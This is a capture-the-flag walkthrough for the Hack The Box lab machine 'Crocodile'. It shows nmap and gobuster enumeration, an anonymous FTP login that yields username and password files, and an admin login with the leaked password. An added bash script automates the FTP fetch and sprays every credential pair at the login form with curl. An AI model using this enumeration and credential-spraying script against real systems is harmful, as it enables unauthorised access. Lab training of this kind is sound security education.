Enumeration
As usual, let's start with nmap:
nmap -sV -sC IP
Replace IP with the IP of the target machine (Crocodile).
Note: The IP of the target machine changes every time it is spawned, so make sure you replace IP in the commands below with the current target IP. You can find it on the machine's page in your Hack The Box account.
Port 21 is open which is FTP (File Transfer Protocol)
Notice the line ftp-anon: Anonymous FTP login allowed (FTP code 230)
Anonymous FTP login allowed means that we should be able to log in with the username anonymous. When anonymous login is allowed, the server does not verify the password (by convention you give an email address, but anything, or nothing at all, is accepted), so we get in without knowing any real credentials.
Let's try it!
ftp 10.129.203.194
At the Name prompt, type
anonymous
and press Enter. If the client does ask for a password, just press Enter again (any value is accepted).
It worked! We are in as anonymous, and we were not even asked for a real password!
Type ls to list the files
Two files stand out: allowed.userlist and allowed.userlist.passwd.
Let's download these files onto our machine by using the get command:
get allowed.userlist
get allowed.userlist.passwd
The files land in the directory you ran ftp from (your home folder if you started it there), so you will find them both downloaded on your machine:
Let's open allowed.userlist :
Looks like a list of usernames!
Let's open allowed.userlist.passwd
These look like the passwords for the allowed users found in the first file, in the same order: line N of allowed.userlist.passwd belongs to the user on line N of allowed.userlist.
So it looks like we now have the password for the account admin !
The password is rKXM59ESxesUFHAd
When we did our nmap earlier, we also noticed that port 80 (HTTP) is open. From our VM, let's open a browser, type the IP of our target machine (Crocodile) into the URL bar and press Enter:
Now let's use gobuster to find any hidden directories:
gobuster dir -u http://10.129.203.194 -w /usr/share/dirb/wordlists/common.txt -x .php
-x .php tells gobuster to also try every word with a .php extension, so PHP files such as login.php show up alongside plain directories.
Gobuster found /login.php
That's interesting: we might be able to use the credentials we just found.
Open your browser again and enter the following in the URL bar:
10.129.203.194/login.php
We get a login page:
Let's try to login with the username and password we just found
username : admin
password: rKXM59ESxesUFHAd
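The manual steps above (anonymous FTP download, reading admin's password off the matching line of the two files, and trying credentials on /login.php) can be scripted. The following is an added example and is not part of the original walkthrough. It assumes the two files line up one-to-one by line number; the sample copies it writes are constructed, with only the admin line taken from this page; and the field names "username" and "password" used for the login form are an assumption you must check against the real form.

```shell
#!/usr/bin/env bash
# Added example (not part of the original walkthrough). Pairs allowed.userlist
# with allowed.userlist.passwd line by line, looks up one user's password, and
# sprays every pair at /login.php with curl instead of trying them by hand.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Constructed sample copies of the two FTP files. Only the admin line is taken
# from the walkthrough; the other three users and passwords are placeholders.
write_samples() {
  printf 'alice\nbob\ncarol\nadmin\n' > "$WORK/allowed.userlist"
  printf 'Winter2024!\nletmein\nqwerty123\nrKXM59ESxesUFHAd\n' > "$WORK/allowed.userlist.passwd"
}

# Non-interactive version of the FTP steps: anonymous login, fetch both files
# into the current directory. Not called here because it needs the live target.
fetch_from_ftp() {
  target="$1"
  ftp -n "$target" <<'EOF'
user anonymous anonymous
get allowed.userlist
get allowed.userlist.passwd
quit
EOF
}

# Join the two files on line number: one "user:password" per line.
pair_creds() {
  paste -d: "$WORK/allowed.userlist" "$WORK/allowed.userlist.passwd"
}

# Password on the same line as the given username (empty if the user is absent).
lookup_password() {
  pair_creds | awk -F: -v u="$1" '$1 == u { print $2; exit }'
}

# Number of pairs; warn if the two files differ in length, because then the
# line-by-line mapping can no longer be trusted.
count_pairs() {
  users=$(wc -l < "$WORK/allowed.userlist")
  pws=$(wc -l < "$WORK/allowed.userlist.passwd")
  if [ "$users" -ne "$pws" ]; then
    echo "warning: $users usernames vs $pws passwords, files may not line up" >&2
  fi
  pair_creds | wc -l | tr -d ' '
}

# Try every pair against the login form and print the HTTP status per attempt.
# Assumptions: the form posts fields named "username" and "password", and a
# successful login answers differently (redirect, different size) than a
# failure. Verify both against the real form before trusting the results.
# Not called here because it needs the live target.
spray_login() {
  base="$1"
  pair_creds | while IFS=: read -r u p; do
    code=$(curl -s -o /dev/null -w '%{http_code}' \
      --data-urlencode "username=$u" --data-urlencode "password=$p" \
      "$base/login.php")
    printf '%-12s %-20s -> HTTP %s\n' "$u" "$p" "$code"
  done
}

write_samples
echo "credential pairs:"
pair_creds
echo "admin -> $(lookup_password admin)"
# Against the box you would run:
#   fetch_from_ftp 10.129.203.194 && spray_login http://10.129.203.194
```

Note that count_pairs warns when the two files have different lengths: if that happens, the line-by-line mapping is no longer safe to assume and you should inspect the files by hand before spraying, since every wrong pair is an extra failed login in the target's logs.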
The flag is right there!
Congratulations! You got your flag!